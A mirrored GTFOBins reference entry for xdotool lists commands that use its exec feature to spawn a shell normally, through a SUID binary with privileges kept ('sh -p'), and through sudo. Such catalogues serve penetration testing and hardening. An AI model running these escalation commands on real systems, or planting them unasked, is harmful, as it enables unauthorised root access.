mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
11 lines
221 B
Markdown
11 lines
221 B
Markdown
---
|
|
description: This requires a running X server.
|
|
functions:
|
|
shell:
|
|
- code: xdotool exec --sync /bin/sh
|
|
suid:
|
|
- code: ./xdotool exec --sync /bin/sh -p
|
|
sudo:
|
|
- code: sudo xdotool exec --sync /bin/sh
|
|
---
|